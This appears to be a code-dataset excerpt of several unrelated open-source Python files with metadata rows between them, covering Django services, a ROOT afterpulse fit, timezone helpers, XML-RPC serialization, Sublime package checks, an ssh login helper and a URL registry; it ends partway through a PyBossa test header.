def htmlentitydecode(s):
"""Decode htmlentities"""
return re.sub('&(%s);' % '|'.join(name2codepoint),
lambda m: chr(name2codepoint[m.group(1)]), s)
def striphtml(data):
"""Remove HTML tags from text"""
p = re.compile(r'<.*?>')
return htmlentitydecode(p.sub('', data)
.replace("(", "/(")
.replace(")", ")/")
.replace(""", "\""))
| agpl-3.0 | 6,018,492,426,457,182,000 | 29.535294 | 78 | 0.592949 | false |
ushatil/wellness-tracker | ws/wellspring/services/vest_service.py | 1 | 1420 | import logging
from wellspring.models import VestSection, VestSubSection
LOGGER = logging.getLogger(__name__)
VEST_SECTIONS = {
"EQUILIBRIUM" : ["SCHOOL", "SELF", "HOME", "WORK"],
"SUPPORT" : ["PROFESSIONALS", "FAMILY", "FRIENDS", "COLLEAGUES"],
"LIFESTYLE" : ["DIET", "EXERCISE", "MEDITATION", "RECREATION"]
}
def add_section(name):
LOGGER.debug("Adding VestSection: " + name)
result = VestSection(section_name=name)
result.save()
return result
def add_subsection(section_name, subsection_name):
LOGGER.debug("Adding VestSubSection: " + section_name + ":" + subsection_name)
vest_section = get_by_name_vest_section(section_name)
result = VestSubSection(vest_section=vest_section, subsection_name=subsection_name)
result.save()
return result
def get_all_vest_section():
LOGGER.debug("Getting all VestSections")
return list(VestSection.objects.all())
def get_all_vest_subsection():
LOGGER.debug("Getting all VestSubSections")
return list(VestSubSection.objects.all())
def get_by_name_vest_section(name):
LOGGER.debug("Getting VestSection by name: " + name)
return VestSection.objects.get(section_name = name)
def get_by_name_vest_subsection(name):
LOGGER.debug("Getting VestSubSection by name: " + name)
    return VestSubSection.objects.get(subsection_name = name)
| mit | 4,386,219,538,674,025,000 | 35.435897 | 87 | 0.671831 | false |
frdwrd/bifocal | bifocal/models/transaction.py | 1 | 3366 | # Copyright (c) 2013-2015, Vehbi Sinan Tunalioglu <[email protected]>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (See http://opensource.org/licenses/BSD-2-Clause)
from .. import utils
class Transaction(object):
def __init__(self, timestamp, quantity, asset, **kwargs):
self.quantity = quantity
try:
self.price = float(kwargs['price']) if 'price' in kwargs else 0.0
except ValueError:
raise ValueError('Invalid price: %s' % kwargs['price'])
self.timestamp = timestamp
self.asset = asset
self.data = kwargs
if type(self.quantity) is not int:
raise ValueError('Invalid quantity: %s' % self.quantity)
if type(self.timestamp) is not int:
raise ValueError('Invalid timestamp: %s' % self.timestamp)
def __eq__(self, other):
for key, value in self.data.iteritems():
if key not in other.data:
return False
if value != other.data[key]:
return False
if self.quantity != other.quantity:
return False
if self.price != other.price:
return False
if self.timestamp != other.timestamp:
return False
if self.asset != other.asset:
return False
return True
def __hash__(self):
return hash(repr(self))
def __repr__(self):
return "%s: %s %s @ %s" % (
utils.timestamp_to_date(self.timestamp, '%Y %m %d'),
self.quantity,
self.asset,
self.price)
def invert_quantity(self):
self.quantity = self.quantity * -1
@property
def size(self):
return abs(self.quantity)
@property
def buy(self):
return self.quantity > 0
@property
def sell(self):
return self.quantity < 0
@property
def zero(self):
return self.quantity == 0
def copy(self, quantity=None):
return Transaction(
self.timestamp,
quantity or self.quantity,
self.asset,
**self.data)
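# Illustrative construction (values are made up):
def _example_transaction():
    t = Transaction(1420070400, 5, 'AAPL', price=100.0)
    assert t.buy and t.size == 5
    return t.copy(quantity=-5)  # mirrored sell side of the same trade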
| agpl-3.0 | 6,468,546,355,782,887,000 | 32.326733 | 77 | 0.645276 | false |
ntim/g4sipm | sample/run/luigi/contrib/afterpulse.py | 1 | 3367 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from ROOT import TH1, Double, ROOT, TF1
def prob_dist_1comp(x, par):
dt = x[0]
amp = par[0]
pL = par[1]
tauL = par[2]
tauTh = par[3]
T = np.exp(-dt / tauTh)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pL) / tauTh
pTot += T * L * pL * (1. / tauL + 1. / tauTh)
return amp * pTot
def prob_dist(x, par):
dt = x[0]
amp = par[0]
pS = par[1]
pL = par[2]
tauS = par[3]
tauL = par[4]
tauTh = par[5]
T = np.exp(-dt / tauTh)
S = np.exp(-dt / tauS)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pS) * (1. - pL) / tauTh
pTot += T * S * pS * (1. - pL) * (1. / tauS + 1. / tauTh)
pTot += T * L * pL * (1. - pS) * (1. / tauL + 1. / tauTh)
pTot += T * S * L * pS * pL * (1. / tauS + 1. / tauL + 1. / tauTh)
return amp * pTot
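# Model behind prob_dist, for reference: the four terms sum to the density
# -dP/dt of the survival probability
#   P(t > dt) = exp(-dt/tauTh)
#               * (1 - pS * (1 - exp(-dt/tauS)))
#               * (1 - pL * (1 - exp(-dt/tauL)))
# i.e. neither a thermal pulse nor a short/long afterpulse occurred before
# dt. prob_dist_1comp is the same expression with the short component
# dropped (pS = 0).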
def fit(h, xlow=50):
# Set default fitter.
ROOT.Math.MinimizerOptions.SetDefaultTolerance(1e-3)
ROOT.Math.MinimizerOptions.SetDefaultMinimizer("Minuit2")
ROOT.Math.MinimizerOptions.SetDefaultMaxIterations(1000)
ROOT.Math.MinimizerOptions.SetDefaultMaxFunctionCalls(1000)
ROOT.Math.MinimizerOptions.SetDefaultPrecision(1e-9)
# Fit thermal noise component.
preFit = TF1("preFit", "[0]*exp(-x/[1])", 600, h.GetBinLowEdge(h.GetNbinsX()))
preFit.SetParameter(1, 1000)
preFit.SetParLimits(1, 10, 10000) # 100kHz to 10MHz
h.Fit(preFit, "RN")
# Fit long component.
preFit2 = TF1("fitDeltaTOneComp", prob_dist_1comp, 400, h.GetBinLowEdge(h.GetNbinsX()), 4)
preFit2.SetParNames("A", "P_{l}", "#tau_{l}", "#tau_{th}")
preFit2.SetParameters(1., 0.2, 150, preFit.GetParameter(1))
preFit2.SetParLimits(1, 0.01, 1.)
preFit2.SetParLimits(2, 80., 240.)
preFit2.SetParLimits(3, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(preFit2, "RNM")
# Fit complete distribution.
fit = TF1("fitDeltaT", prob_dist, xlow, h.GetBinLowEdge(h.GetNbinsX()), 6)
fit.SetParNames("A", "P_{s}", "P_{l}", "#tau_{s}", "#tau_{l}", "#tau_{th}")
fit.SetParameters(1., 0.2, preFit2.GetParameter(1), 50, preFit2.GetParameter(2), preFit.GetParameter(1))
fit.SetParLimits(1, 0.01, 1.)
fit.SetParLimits(2, preFit2.GetParameter(1) - 10. * preFit2.GetParError(1), preFit2.GetParameter(1) + 10. * preFit2.GetParError(1))
fit.SetParLimits(3, 10., 80.)
fit.SetParLimits(4, preFit2.GetParameter(2) - 10. * preFit2.GetParError(2), preFit2.GetParameter(2) + 10. * preFit2.GetParError(2))
fit.SetParLimits(5, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(fit, "RNM")
h.GetListOfFunctions().Add(fit)
# Return results
amp = fit.GetParameter(0)
amp_err = fit.GetParError(0)
p_ap_s = fit.GetParameter(1)
p_ap_s_err = fit.GetParError(1)
p_ap_l = fit.GetParameter(2)
p_ap_l_err = fit.GetParError(2)
tau_s = fit.GetParameter(3)
tau_s_err = fit.GetParError(3)
tau_l = fit.GetParameter(4)
tau_l_err = fit.GetParError(4)
tau_th = fit.GetParameter(5)
tau_th_err = fit.GetParError(5)
return amp, amp_err, p_ap_s, p_ap_s_err, p_ap_l, p_ap_l_err, tau_s, tau_s_err, tau_l, tau_l_err, tau_th, tau_th_err, fit.GetChisquare(), fit.GetNDF()
| gpl-3.0 | -5,261,657,332,472,781,000 | 40.567901 | 153 | 0.610039 | false |
cedadev/cloudhands-burst | cloudhands/burst/agent.py | 1 | 2328 | #!/usr/bin/env python
# encoding: UTF-8
import asyncio
from collections import namedtuple
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
import logging
import sqlite3
import warnings
from cloudhands.common.connectors import initialise
from cloudhands.common.connectors import Registry
Job = namedtuple("Job", ["uuid", "token", "artifact"])
class Agent:
def __init__(self, workQ, args, config):
self.work = workQ
self.args = args
self.config = config
@staticmethod
def queue(args, config, loop=None):
return asyncio.Queue(loop=loop)
@property
def callbacks(self):
raise NotImplementedError
def jobs(self, session):
raise NotImplementedError
@asyncio.coroutine
    def __call__(self, loop, msgQ, session):  # invoked by operate() below
raise NotImplementedError
@singledispatch
def message_handler(msg, *args, **kwargs):
warnings.warn("No handler for {}".format(type(msg)))
pass
@asyncio.coroutine
def operate(loop, msgQ, workers, args, config):
log = logging.getLogger("cloudhands.burst.operate")
session = Registry().connect(sqlite3, args.db).session
initialise(session)
tasks = [asyncio.Task(w(loop, msgQ, session)) for w in workers]
pending = set()
log.info("Starting task scheduler.")
while any(task for task in tasks if not task.done()):
yield from asyncio.sleep(0)
for worker in workers:
for job in worker.jobs(session):
if job.uuid not in pending:
pending.add(job.uuid)
log.debug("Sending {} to {}.".format(job, worker))
yield from worker.work.put(job)
pause = 0.1 if pending else 1
yield from asyncio.sleep(pause)
try:
while True:
msg = msgQ.get_nowait()
try:
act = session.merge(message_handler(msg, session))
except Exception as e:
session.rollback()
log.error(e)
else:
pending.discard(act.artifact.uuid)
session.close() # Refresh or expire not effective here
log.debug(msg)
except asyncio.QueueEmpty:
continue
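# Minimal illustrative subclass (names invented; the real agents live
# elsewhere in cloudhands.burst and query the session for pending work):
class _EchoAgent(Agent):
    """Drains its work queue and reports each job straight back."""
    def jobs(self, session):
        return []  # a real implementation would query `session` here
    @asyncio.coroutine
    def __call__(self, loop, msgQ, session):
        while True:
            job = yield from self.work.get()
            yield from msgQ.put(job)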
| bsd-3-clause | -3,134,247,760,245,154,000 | 27.048193 | 75 | 0.60567 | false |
orlenko/bccf | src/django_cron/timezone.py | 1 | 8256 | """Timezone helper functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
from datetime import datetime, timedelta, tzinfo
from threading import local
import time as _time
try:
import pytz
except ImportError:
pytz = None
from django.conf import settings
__all__ = [
'utc', 'get_default_timezone', 'get_current_timezone',
'activate', 'deactivate', 'override',
'is_naive', 'is_aware', 'make_aware', 'make_naive',
]
settings.USE_TZ = False
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class LocalTimezone(tzinfo):
"""
Local time implementation taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
"""
def __init__(self):
# This code is moved in __init__ to execute it as late as possible
# See get_default_timezone().
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def __repr__(self):
return "<LocalTimezone>"
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
# In order to avoid accessing the settings at compile time,
# wrap the expression in a function and cache the result.
_localtime = None
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
See also :func:`get_current_timezone`.
"""
global _localtime
if _localtime is None:
if isinstance(settings.TIME_ZONE, basestring) and pytz is not None:
_localtime = pytz.timezone(settings.TIME_ZONE)
else:
_localtime = LocalTimezone()
return _localtime
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
local_now = datetime.now(timezone)
return timezone.tzname(local_now)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, basestring) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
    time zone name, or ``None``. If it is a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
self.old_timezone = getattr(_active, 'value', None)
def __enter__(self):
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is not None:
_active.value = self.old_timezone
else:
del _active.value
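# Illustrative use of override (a tzinfo instance always works; a zone
# name additionally requires pytz, as with activate() above):
def _example_override():
    with override(utc):
        return get_current_timezone_name()  # -> 'UTC'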
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (isinstance(value, datetime)
and (settings.USE_TZ if use_tz is None else use_tz)
and not is_naive(value)
and getattr(value, 'convert_to_local_time', True))
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is not None and value.tzinfo.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def make_aware(value, timezone):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if hasattr(timezone, 'localize'):
# available for pytz time zones
return timezone.localize(value, is_dst=None)
else:
# may be wrong around DST changes
return value.replace(tzinfo=timezone)
def make_naive(value, timezone):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
    return value.replace(tzinfo=None)
| unlicense | 6,542,756,796,065,424,000 | 27.277397 | 81 | 0.645833 | false |
asphalt-framework/asphalt-web | asphalt/web/rpc/xmlrpc/serialization.py | 1 | 4239 | import math
from base64 import b64encode, b64decode
from collections import OrderedDict
from collections.abc import Sequence, Mapping
from datetime import date, datetime
from typing import List, Dict, Any
from xml.sax.saxutils import escape
from asphalt.core.utils import qualified_name
from lxml.etree import Element
__all__ = ('serialize', 'deserialize')
_serializers = OrderedDict()
_deserializers = OrderedDict()
def serialize(obj) -> str:
"""
Serialize the given object into an XML-RPC ``<value>`` element.
:param obj: the object to serialize
:return: an XML fragment
"""
for cls, func in _serializers.items():
if isinstance(obj, cls):
return '<value>%s</value>' % func(obj)
raise TypeError('%s is not serializable' % qualified_name(obj.__class__))
def serializer(cls: type):
def wrapper(func):
_serializers[cls] = func
return func
return wrapper
@serializer(str)
def serialize_str(obj: str) -> str:
return '<string>%s</string>' % escape(obj)
@serializer(bool)
def serialize_bool(obj: bool) -> str:
return '<boolean>%d</boolean>' % obj
@serializer(int)
def serialize_int(obj: int) -> str:
if not -2147483648 <= obj <= 2147483647:
raise ValueError('%d is out of range of XML-RPC (32-bit) integer' % obj)
return '<i4>%d</i4>' % obj
@serializer(float)
def serialize_float(obj: float) -> str:
if math.isnan(obj) or math.isinf(obj):
raise ValueError('XML-RPC does not support serializing infinity or NaN float objects')
    # str() already yields a round-trippable form; rstrip('0') would mangle
    # values such as 1e+20 -> '1e+2' and 10.0 -> '10.'
    return '<double>%s</double>' % obj
@serializer(bytes)
def serialize_bytes(obj: bytes):
return '<base64>%s</base64>' % b64encode(obj).decode()
@serializer(datetime)
def serialize_datetime(obj: datetime) -> str:
return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT%H:%M:%S')
@serializer(date)
def serialize_date(obj: date) -> str:
return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT00:00:00')
@serializer(Sequence)
def serialize_sequence(obj: Sequence) -> str:
payload = [serialize(value) for value in obj]
return '<array><data>%s</data></array>' % ''.join(payload)
@serializer(Mapping)
def serialize_mapping(obj: Mapping) -> str:
payload = '<struct>'
for key, value in obj.items():
serialized_value = serialize(value)
payload += '<member><name>%s</name>%s</member>' % (escape(key), serialized_value)
return payload + '</struct>'
def deserialize(value: Element):
"""
Deserialize an XML-RPC <value> element.
:param value: an XML element with the tag <value>
:return: the deserialized value
"""
child = value[0]
try:
func = _deserializers[child.tag]
except KeyError:
raise LookupError('unknown XML-RPC type: %s' % child.tag) from None
return func(child)
def deserializer(*names: str):
def wrapper(func):
_deserializers.update({key: func for key in names})
return func
return wrapper
@deserializer('string')
def deserialize_str(element: Element) -> str:
    return element.text or ''  # an empty <string/> parses with text == None
@deserializer('boolean')
def deserialize_bool(element: Element) -> bool:
if element.text == '1':
return True
elif element.text == '0':
return False
else:
raise ValueError('invalid value for boolean: %s' % element.text)
@deserializer('int', 'i4')
def deserialize_int(element: Element) -> int:
return int(element.text)
@deserializer('double', 'float')
def deserialize_float(element: Element) -> float:
return float(element.text)
@deserializer('base64')
def deserialize_base64(element: Element) -> bytes:
return b64decode(element.text)
@deserializer('dateTime.iso8601')
def deserialize_datetime(element: Element) -> datetime:
return datetime.strptime(element.text, '%Y%m%dT%H:%M:%S')
@deserializer('array')
def deserialize_array(element: Element) -> List:
return [deserialize(value) for value in element.findall('data/value')]
@deserializer('struct')
def deserialize_struct(element: Element) -> Dict[str, Any]:
members = element.findall('member')
return {member.find('name').text: deserialize(member.find('value')) for member in members}
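# Round-trip sketch (lxml assumed available, as imported above):
def _example_roundtrip():
    from lxml import etree
    xml = serialize({'answer': 42, 'tags': ['a', 'b']})
    assert deserialize(etree.fromstring(xml)) == {'answer': 42, 'tags': ['a', 'b']}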
| apache-2.0 | 5,541,318,617,819,902,000 | 25.166667 | 94 | 0.671621 | false |
packagecontrol/st_package_reviewer | st_package_reviewer/check/file/check_redundant_files.py | 2 | 1795 | import logging
from . import FileChecker
l = logging.getLogger(__name__)
class CheckPackageMetadata(FileChecker):
def check(self):
if self.sub_path("package-metadata.json").is_file():
self.fail("'package-metadata.json' is supposed to be automatically generated "
"by Package Control during installation")
class CheckPycFiles(FileChecker):
def check(self):
pyc_files = self.glob("**/*.pyc")
if not pyc_files:
return
for path in pyc_files:
if path.with_suffix(".py").is_file():
with self.file_context(path):
self.fail("'.pyc' file is redundant because its corresponding .py file exists")
class CheckCacheFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.cache")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.cache' file is redundant and created by ST automatically")
class CheckSublimePackageFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-package")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-package' files have no business being inside a package")
class CheckSublimeWorkspaceFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-workspace")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-workspace' files contain session data and should never be "
"submitted to version control")
| mit | 7,026,769,167,104,673,000 | 27.492063 | 99 | 0.597214 | false |
HazyResearch/dd-genomics | archived/v1/code/gene_pheno_pairs.py | 1 | 2378 | import ddext
from ddext import SD
def init():
ddext.input('doc_id', 'text')
ddext.input('sent_id_1', 'int')
ddext.input('mention_id_1', 'text')
ddext.input('wordidxs_1', 'int[]')
ddext.input('words_1', 'text[]')
ddext.input('entity_1', 'text')
ddext.input('type_1', 'text')
ddext.input('correct_1', 'boolean')
ddext.input('sent_id_2', 'int')
ddext.input('mention_id_2', 'text')
ddext.input('wordidxs_2', 'int[]')
ddext.input('words_2', 'text[]')
ddext.input('entity_2', 'text')
ddext.input('type_2', 'text')
ddext.input('correct_2', 'boolean')
ddext.returns('doc_id', 'text')
ddext.returns('sent_id_1', 'int')
ddext.returns('sent_id_2', 'int')
ddext.returns('relation_id', 'text')
ddext.returns('type', 'text')
ddext.returns('mention_id_1', 'text')
ddext.returns('mention_id_2', 'text')
ddext.returns('wordidxs_1', 'int[]')
ddext.returns('wordidxs_2', 'int[]')
ddext.returns('words_1', 'text[]')
ddext.returns('words_2', 'text[]')
ddext.returns('entity_1', 'text')
ddext.returns('entity_2', 'text')
ddext.returns('is_correct', 'boolean')
def run(doc_id, sent_id_1, mention_id_1, wordidxs_1, words_1, entity_1, mtype_1, correct_1, sent_id_2, mention_id_2, wordidxs_2, words_2, entity_2, mtype_2, correct_2):
if 'pos_pairs' in SD:
pos_pairs = SD['pos_pairs']
else:
import os
APP_HOME = os.environ['DD_GENOMICS_HOME']
pos_pairs = set()
gpheno = [x.strip().split('\t') for x in open('%s/onto/data/hpo_phenotype_genes.tsv' % APP_HOME)]
gdisease = [x.strip().split('\t') for x in open('%s/onto/data/hpo_disease_genes.tsv' % APP_HOME)]
for pheno, gene in gpheno + gdisease:
pos_pairs.add((gene, pheno))
SD['pos_pairs'] = pos_pairs
rid = '%s_%s_g%s_p%s' % (doc_id, sent_id_1,
'%d:%d' % (wordidxs_1[0], wordidxs_1[-1]),
'%d:%d' % (wordidxs_2[0], wordidxs_2[-1]),
)
truth = None
if correct_1 and correct_2:
gene = entity_1
for pheno in entity_2.split()[0].split('|'):
if (gene, pheno) in pos_pairs:
truth = True
elif correct_1 is False or correct_2 is False:
truth = False
yield (doc_id,
sent_id_1,
sent_id_2,
rid,
None,
mention_id_1,
mention_id_2,
wordidxs_1,
wordidxs_2,
words_1,
words_2,
entity_1,
entity_2,
truth
)
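# Illustrative invocation (a DeepDive extractor streams real rows; the
# doc/mention/entity values below are placeholders):
#   next(run('doc1', 3, 'm1', [4], ['BRCA1'], 'BRCA1', 'gene', True,
#            3, 'm2', [7], ['cancer'], 'HP:0003002', 'pheno', True))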
| apache-2.0 | -2,130,952,374,785,913,000 | 29.101266 | 168 | 0.584945 | false |
dgouldin/djangocon-eu-2015 | djapi/api/url_registry.py | 2 | 2925 | import types
from collections import defaultdict
from functools import wraps
from urlparse import urljoin
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse, NoReverseMatch
LIST_METHODS = ('POST',)
DETAIL_METHODS = ('PUT', 'PATCH', 'DELETE',)
ALL_METHODS = LIST_METHODS + DETAIL_METHODS
model_registry = defaultdict(list)
def register(methods, model):
"""
Decorator for registering lookup functions. Modeled after django.dispatch.receiver.
A lookup_func should return a fully qualified path.
"""
def _decorator(lookup_func):
model_registry[model].append((methods, lookup_func))
return lookup_func
return _decorator
def normalize_channel(path):
"Strip off querystring and trailing slashes"
return path.split('?', 1)[0].rstrip('/')
def find_urls(obj, method):
"Utility to locate URLs that might include details of a given object"
for methods, lookup_func in model_registry[type(obj)]:
if method in methods:
yield lookup_func(obj)
# helpers for generating common URLs
def empty(viewname):
"For URLs that don't require any arguments at all"
url = reverse(viewname)
def _empty(obj):
return url
return _empty
def primary_key(viewname):
"For URLs that accept a primary key as 'pk'"
def _primary_key(obj):
return reverse(viewname, kwargs={'pk': obj.pk})
return _primary_key
def primary_key_filter(viewname):
"For URLs that filter on the primary key field via a query param"
def _primary_key_filter(obj):
pk_field = obj.__class__._meta.pk.name
return "{}?{}={}".format(reverse(viewname), pk_field, obj.pk)
return _primary_key_filter
def foreign_key(viewname, fk_field_name):
"""
For URLs that refer to an instance via a foreign key
Accepts the name of the foreign key
"""
def _foreign_key(obj):
fk_field = obj.__class__._meta.get_field(fk_field_name)
return reverse(viewname, kwargs={'pk': getattr(obj, fk_field.attname)})
return _foreign_key
def generic_foreign_key(viewname, gfk_field_name, model):
"""
For URLs that refer to an instance via a generic foreign key
Accepts the name of the foreign key, and also the model this particular URL
is associated with, since the foreign key can refer to multiple model types
"""
def _generic_foreign_key(obj):
content_type_id = ContentType.objects.get_for_model(model).id
gfk_field = getattr(obj.__class__, gfk_field_name)
ct_field = obj._meta.get_field(gfk_field.ct_field)
if getattr(obj, ct_field.attname) == content_type_id:
return reverse(viewname, kwargs={'pk': getattr(obj, gfk_field.fk_field)})
# this should never happen
raise NoReverseMatch('Unable to resolve generic foreign key for {}'.format(obj))
return _generic_foreign_key
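# Illustrative wiring (the Article model and the 'api-article-detail'
# viewname are assumptions); lookups registered like this are later
# resolved through find_urls(obj, method):
#   register(DETAIL_METHODS, Article)(primary_key('api-article-detail'))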
| mit | -4,767,235,335,549,177,000 | 30.451613 | 88 | 0.681709 | false |
jarod-w/ocsetup | ocsetup/sshcmd.py | 1 | 1977 | #!/usr/bin/env python
import pexpect
import sys
import gtk
from ovirtnode.ovirtfunctions import log
class PopupEntry(gtk.Dialog):
def __init__(self, label="", title="", parent=None, flags=0, buttons=None):
super(PopupEntry, self).__init__(title, parent, flags, buttons)
self.hbox = gtk.HBox()
self.label = gtk.Label(label)
self.add_button("OK", gtk.RESPONSE_OK)
self.entry = gtk.Entry()
self.entry.set_visibility(False)
self.hbox.pack_start(self.label)
self.hbox.pack_start(self.entry)
self.vbox.pack_start(self.hbox)
self.set_position(gtk.WIN_POS_CENTER_ALWAYS)
def run_and_close(self):
self.show_all()
resp_id = self.run()
text = self.entry.get_text()
self.destroy()
return text
def runcmd(cmd):
child = pexpect.spawn(cmd, logfile=sys.stdout)
    title = ""
    while True:
i = child.expect([
pexpect.TIMEOUT,
'Are you sure you want to continue connecting',
'Enter passphrase for key',
'Permission denied, please try again.',
'password: ',
'Permission denied',
pexpect.EOF])
if i == 0:
# TIMEOUT.
return
elif i == 1:
child.sendline('yes')
elif i == 2:
child.send("\r")
        elif i == 3:
            # Wrong password; ssh re-prompts right after this, so just flag
            # it and let the 'password: ' branch below ask the user again.
            title = "Wrong Password?"
        elif i == 4:
            password = PopupEntry(label='Password:',
                                  title=title).run_and_close()
            child.sendline(password)
            title = ""
elif i == 5:
# LOGIN FAILED
return
elif i == 6:
# LOGIN SUCCEED.
return child
else:
log(
"run cmd error i = %d\n before:%s\nafter:%s" %
(i, child.before, child.after))
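# Illustrative call (host and command are placeholders); runcmd returns
# the spawned child only once a successful login has reached EOF:
#   child = runcmd('ssh [email protected] uptime')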
| gpl-2.0 | -8,240,140,385,106,602,000 | 28.954545 | 79 | 0.528073 | false |
PyBossa/pybossa | test/test_s3_client.py | 1 | 5554 | # -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2015 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
